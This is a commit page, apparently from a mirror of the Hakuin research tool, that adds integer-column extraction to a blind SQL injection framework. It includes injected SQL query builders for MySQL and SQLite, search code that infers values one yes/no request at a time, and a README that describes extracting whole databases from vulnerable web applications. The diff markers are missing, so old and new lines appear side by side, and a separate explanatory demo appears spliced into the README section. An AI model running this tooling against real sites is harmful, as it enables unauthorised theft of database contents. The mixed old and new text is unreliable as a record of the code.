mirror of https://github.com/pruzko/hakuin synced 2024-09-08 03:30:41 +02:00

integer columns extraction, readme update, logo background

Jakub Pruzinec 2023-10-29 17:05:38 +08:00
parent 30c08a8a44
commit dc0bc22682
13 changed files with 169 additions and 51 deletions


@ -2,13 +2,14 @@
<img width="150" src="https://raw.githubusercontent.com/pruzko/hakuin/main/logo.png">
</p>
Hakuin is a Blind SQL Injection (BSQLI) inference optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract textual data in databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for DB content.
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for textual DB content.
Hakuin been presented at academic and industrial conferences:
- [IEEE Workshop on Offsensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023
Hakuin has been presented at esteemed academic and industrial conferences:
- [BlackHat MEA, Riyadh](https://blackhatmea.com/session/hakuin-injecting-brain-blind-sql-injection), 2023
- [Hack in the Box, Phuket](https://conference.hitb.org/hitbsecconf2023hkt/session/hakuin-injecting-brains-into-blind-sql-injection/), 2023
- [IEEE S&P Workshop on Offensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023
Also, make sure to read our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) or see the [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf).
More information can be found in our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) and [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf).
## Installation
@ -48,9 +49,9 @@ class ContentRequester(Requester):
return 'found' in r.content.decode()
```
To start infering data, use the `Extractor` class. It requires a `DBMS` object to contruct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`.
To start extracting data, use the `Extractor` class. It requires a `DBMS` object to construct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`.
##### Example 1 - Inferring SQLite DBs
##### Example 1 - Extracting SQLite DBs
```python
from hakuin.dbms import SQLite
from hakuin import Extractor, Requester
@ -58,43 +59,43 @@ from hakuin import Extractor, Requester
class StatusRequester(Requester):
...
exf = Extractor(requester=StatusRequester(), dbms=SQLite())
ext = Extractor(requester=StatusRequester(), dbms=SQLite())
```
##### Example 2 - Inferring MySQL DBs
##### Example 2 - Extracting MySQL DBs
```python
from hakuin.dbms import MySQL
...
exf = Extractor(requester=StatusRequester(), dbms=MySQL())
ext = Extractor(requester=StatusRequester(), dbms=MySQL())
```
Now that eveything is set, you can start inferring DB schemas.
Now that everything is set, you can start extracting DB schemas.
##### Example 1 - Inferring DB Schemas
##### Example 1 - Extracting DB Schemas
```python
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained models
schema = exf.extract_schema(strategy='model')
schema = ext.extract_schema(strategy='model')
```
##### Example 2 - Inferring DB Schemas with Metadata
##### Example 2 - Extracting DB Schemas with Metadata
```python
# metadata:
# True: Detect column settings (data type, nullable, primary key)
# False: Pass
schema = exf.extract_schema(strategy='model', metadata=True)
schema = ext.extract_schema(strategy='model', metadata=True)
```
##### Example 3 - Inferring only Table/Column Names
##### Example 3 - Extracting only Table/Column Names
```python
tables = exf.extract_table_names(strategy='model')
columns = exf.extract_column_names(table='users', strategy='model')
tables = ext.extract_table_names(strategy='model')
columns = ext.extract_column_names(table='users', strategy='model')
```
Once you know the schema, you can extract the actual content.
##### Example 1 - Inferring Textual Columns
##### Example 1 - Extracting Textual Columns
```python
# strategy:
# 'binary': Use binary search
@ -102,7 +103,12 @@ Once you know the schema, you can extract the actual content.
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = exfiltrate_text_data(table='users', column='address', strategy='dynamic'):
res = ext.extract_column_text(table='users', column='address', strategy='dynamic')
```
##### Example 2 - Extracting Integer Columns
```python
res = ext.extract_column_int(table='users', column='id')
```
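The idea behind integer extraction can be sketched with a local database standing in for the injection point. This is a minimal illustration, not Hakuin's code: `make_oracle` and `infer_int` are hypothetical helpers, the in-memory `users` table is made up for the demo, and the only thing taken from this commit is the shape of the query (`column < n` on one row) and the idea of first expanding the bounds exponentially and then running a binary search.

```python
import sqlite3


def make_oracle(conn, table, column, row):
    '''Builds a yes/no oracle for "value in the given row < n" (hypothetical helper).'''
    def oracle(n):
        # Same query shape as the SQLite `int` query in this commit; identifiers
        # are quoted naively here, which is acceptable only for a local demo.
        query = f'SELECT "{column}" < ? FROM "{table}" LIMIT 1 OFFSET ?'
        return bool(conn.execute(query, (n, row)).fetchone()[0])
    return oracle


def infer_int(oracle, lower=0, upper=128):
    '''Infers an integer using only "value < n" questions.'''
    # Expand the lower bound while the value is below it, doubling the step.
    step = upper - lower
    while oracle(lower):
        upper = lower
        lower -= step
        step *= 2

    # Expand the upper bound while the value is not below it.
    step = upper - lower
    while not oracle(upper):
        lower = upper
        upper += step
        step *= 2

    # Binary search with the invariant lower <= value < upper.
    while upper - lower > 1:
        mid = (lower + upper) // 2
        if oracle(mid):
            upper = mid
        else:
            lower = mid
    return lower


# Demo data: a made-up table with small, large, and negative integers.
conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE users (id INTEGER)')
conn.executemany('INSERT INTO users VALUES (?)', [(7,), (1000,), (-300,)])

ids = [infer_int(make_oracle(conn, 'users', 'id', row)) for row in range(3)]
print(ids)
```

In a real attack each call to the oracle is one HTTP request, so the number of questions matters. Doubling the step keeps the bound expansion logarithmic in the size of the value.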
More examples can be found in the `tests` directory.
@ -110,7 +116,7 @@ More examples can be found in the `tests` directory.
## For Researchers
This repository is maintained to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
#### Cite Hakuin


@ -25,7 +25,7 @@ class Extractor:
models with Huffman trees
Returns:
list: List of extracted table names
list: list of extracted table names
'''
allowed = ['binary', 'model']
assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
@ -35,8 +35,10 @@ class Extractor:
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.TablesQueries.rows_count,
lower=0,
upper=8,
find_range=True,
find_lower=False,
find_upper=True,
).run(ctx)
if strategy == 'binary':
@ -61,7 +63,7 @@ class Extractor:
models with Huffman trees
Returns:
list: List of extracted column names
list: list of extracted column names
'''
allowed = ['binary', 'model']
assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
@ -71,8 +73,10 @@ class Extractor:
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.ColumnsQueries.rows_count,
lower=0,
upper=8,
find_range=True,
find_lower=False,
find_upper=True,
).run(ctx)
if strategy == 'binary':
@ -137,7 +141,7 @@ class Extractor:
return schema
def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
def extract_column_text(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
'''Extracts text column.
Params:
@ -152,7 +156,7 @@ class Extractor:
n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set
Returns:
list: List of strings in the column
list: list of strings in the column
'''
allowed = ['binary', 'unigram', 'fivegram', 'dynamic']
assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
@ -161,8 +165,10 @@ class Extractor:
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.RowsQueries.rows_count,
lower=0,
upper=n_rows_guess,
find_range=True,
find_lower=False,
find_upper=True,
).run(ctx)
if strategy == 'binary':
@ -185,3 +191,30 @@ class Extractor:
queries=self.dbms.RowsQueries,
charset=charset,
).run(ctx, n_rows)
def extract_column_int(self, table, column, n_rows_guess=128):
'''Extracts integer column.
Params:
table (str): table name
column (str): column name
n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set
Returns:
list: list of integers in the column
'''
ctx = search_alg.Context(table, column, None, None)
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.RowsQueries.rows_count,
lower=0,
upper=n_rows_guess,
find_lower=False,
find_upper=True,
).run(ctx)
return collect.IntCollector(
requester=self.requester,
queries=self.dbms.RowsQueries,
).run(ctx, n_rows)


@ -60,6 +60,22 @@ class Collector(metaclass=ABCMeta):
raise NotImplementedError()
class IntCollector(Collector):
'''Collector for integer columns'''
def __init__(self, requester, queries):
super().__init__(requester, queries)
def collect_row(self, ctx):
return IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.queries.int,
lower=0,
upper=128,
find_lower=True,
find_upper=True,
).run(ctx)
class TextCollector(Collector):
'''Collector for text columns.'''
@ -218,7 +234,8 @@ class BinaryTextCollector(TextCollector):
query_cb=self.queries.char_unicode,
lower=ASCII_MAX + 1,
upper=UNICODE_MAX + 1,
find_range=False,
find_lower=False,
find_upper=False,
correct=correct_ord,
)
res = search_alg.run(ctx)


@ -293,6 +293,16 @@ class MySQLRowsQueries(UniformQueries):
return self.normalize(query)
def int(self, ctx, n):
query = f'''
SELECT {MySQL.escape(ctx.column)} < {n}
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
class MySQL(DBMS):
DATA_TYPES = [


@ -278,6 +278,14 @@ class SQLiteRowsQueries(UniformQueries):
return self.normalize(query)
def int(self, ctx, n):
query = f'''
SELECT {SQLite.escape(ctx.column)} < {n}
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)


@ -44,7 +44,7 @@ class SearchAlgorithm(metaclass=ABCMeta):
class IntExponentialBinarySearch(SearchAlgorithm):
'''Exponential and binary search for integers.'''
def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None):
def __init__(self, requester, query_cb, lower=0, upper=16, find_lower=False, find_upper=True, correct=None):
'''Constructor.
Params:
@ -52,13 +52,15 @@ class IntExponentialBinarySearch(SearchAlgorithm):
query_cb (function): query construction function
lower (int): lower bound of search range
upper (int): upper bound of search range
find_range (bool): exponentially expands range until the correct value is within
find_lower (bool): exponentially expands the lower bound until the correct value is within
find_upper (bool): exponentially expands the upper bound until the correct value is within
correct (int|None): correct value. If provided, the search is emulated
'''
super().__init__(requester, query_cb)
self.lower = lower
self.upper = upper
self.find_range = find_range
self.find_lower = find_lower
self.find_upper = find_upper
self.correct = correct
self.n_queries = 0
@ -74,29 +76,42 @@ class IntExponentialBinarySearch(SearchAlgorithm):
'''
self.n_queries = 0
if self.find_range:
lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper)
else:
lower, upper = self.lower, self.upper
if self.find_lower:
self._find_lower(ctx, self.upper - self.lower)
if self.find_upper:
self._find_upper(ctx, self.upper - self.lower)
return self._search(ctx, lower, upper)
return self._search(ctx, self.lower, self.upper)
def _find_range(self, ctx, lower, upper):
'''Exponentially expands the search range until the correct value is within.
def _find_lower(self, ctx, step):
'''Exponentially expands the lower bound until the correct value is within.
Params:
ctx (Context): extraction context
lower (int): lower bound
upper (int): upper bound
Returns:
int: correct upper bound
step (int): initial step
'''
if self._query(ctx, upper):
return lower, upper
if not self._query(ctx, self.lower):
return
return self._find_range(ctx, upper, upper * 2)
self.upper = self.lower
self.lower -= step
self._find_lower(ctx, step * 2)
def _find_upper(self, ctx, step):
'''Exponentially expands the upper bound until the correct value is within.
Params:
ctx (Context): extraction context
step (int): initial step
'''
if self._query(ctx, self.upper):
return
self.lower = self.upper
self.upper += step
self._find_upper(ctx, step * 2)
def _search(self, ctx, lower, upper):

BIN
logo.png

Binary file not shown.

Size: 12 KiB before, 24 KiB after.

BIN
tests/dbs/data_types.sqlite Normal file

Binary file not shown.

tests/test_data_types.py Normal file

@ -0,0 +1,28 @@
import json
import logging
import hakuin
from hakuin import Extractor
from hakuin.dbms import SQLite
from OfflineRequester import OfflineRequester
logging.basicConfig(level=logging.INFO)
def main():
requester = OfflineRequester(db='data_types', verbose=True)
ext = Extractor(requester=requester, dbms=SQLite())
# res = ext.extract_schema(strategy='binary')
# print(res)
res = ext.extract_column_int('data_types', 'integer')
if __name__ == '__main__':
main()


@ -25,7 +25,7 @@ def main():
ext = Extractor(requester=requester, dbms=SQLite())
if len(sys.argv) == 3:
res = ext.extract_column(sys.argv[1], sys.argv[2])
res = ext.extract_column_text(sys.argv[1], sys.argv[2])
print('Total requests:', requester.n_queries)
print('Average RPC:', requester.n_queries / len(''.join(res)))
else:
@ -43,7 +43,7 @@ def main():
# measure rpc
for table, columns in rpc.items():
for column in columns:
res = ext.extract_column(table, column)
res = ext.extract_column_text(table, column)
res_len = len(''.join(res))
col_rpc = requester.n_queries / len(''.join(res))
rpc[table][column] = (requester.n_queries, col_rpc)


@ -13,7 +13,7 @@ logging.basicConfig(level=logging.INFO)
def main():
requester = OfflineRequester(db='large_schema')
requester = OfflineRequester(db='large_schema', verbose=False)
ext = Extractor(requester=requester, dbms=SQLite())
res = ext.extract_schema()


@ -47,7 +47,8 @@ def main():
res = ext.extract_schema(strategy='model', metadata=True)
print(json.dumps(res, indent=4))
else:
res = ext.extract_column(table, column)
res = ext.extract_column_text(table, column)
# res = ext.extract_column_int(table, column)
print(json.dumps(res, indent=4))


@ -20,7 +20,7 @@ def main():
res = ext.extract_schema(strategy='binary')
print(res)
res = ext.extract_column('Ħ€ȽȽ©', 'ŴǑȒȽƉ')
res = ext.extract_column_text('Ħ€ȽȽ©', 'ŴǑȒȽƉ')